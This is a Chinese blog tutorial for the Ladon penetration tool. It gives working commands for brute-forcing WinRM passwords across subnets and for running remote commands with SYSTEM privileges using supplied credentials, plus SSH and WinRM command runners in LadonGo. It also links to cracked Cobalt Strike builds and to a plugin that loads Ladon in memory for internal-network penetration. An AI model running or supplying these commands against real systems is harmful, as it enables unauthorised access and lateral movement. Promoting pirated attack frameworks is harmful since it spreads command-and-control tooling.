〖教程〗Ladon WinrmExec2远程执行命令

<% Visit %>

版本

>= Ladon 911

WinrmScan 5985密码爆破

1
2
Ladon 192.168.1.8 WinrmScan
Ladon 192.168.1.8/24 WinrmScan

WinrmExec 远程执行命令

1.有回显
2.支持SYSTEM权限

1
Ladon winrmexec 192.168.50.235 5985 admin$ "XXtest520!@#" "whoami"

使用http访问查看图片

WinrmExec2 远程执行命令

1.无回显
2.支持SYSTEM权限

1
2
3
4
5
6
7
Usage:
Ladon WinrmExec2 <Target> [Port] [Domain] [Username] [Password] <Command>
Default Port is 5985
Example:
Ladon WinrmExec2 192.168.1.116 . k8gege K8test520!@# calc.exe
Ladon WinrmExec2 192.168.1.116 80 . k8gege K8test520!@# calc.exe
Ladon WinrmExec2 192.168.1.116 5985 . k8gege K8test520!@# calc.exe

Winrm密码爆破/端口复用后门

相关知识点请参考:https://k8gege.org/Ladon/WinrmScan.html

使用http访问查看图片

系统内置Winrs执行

在用户权限下正常,但在SYSTEM权限下无法执行
使用http访问查看图片

Ladon WinrmExec2执行

无论是用户权限还是SYSTEM权限下都可正常执行
使用http访问查看图片

LadonGo 全平台

1
2
Ladon SshCmd host port user pass cmd
Ladon WinrmCmd host port user pass cmd

使用http访问查看图片

前提条件

无论是系统自带的winrs命令还是WinrmExec均需给客户端添加信任
使用http访问查看图片

CS下载

CS 3.12 3.13 4.3 4.4 K8破解版
000为原始试用版本(部分未找到,大家可以提供给我更新)
https://github.com/k8gege/Aggressor/releases/tag/cs

CS内存加载Ladon插件

Cobalt Strike 内存加载Ladon插件内网渗透
https://k8gege.org/p/cs_ladon.html

Download

LadonGo (ALL OS)

https://github.com/k8gege/LadonGo/releases

Ladon (Windows & Cobalt Strike)

PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: https://github.com/k8gege/Ladon/releases
911版本:http://k8gege.org/Download

转载声明

K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org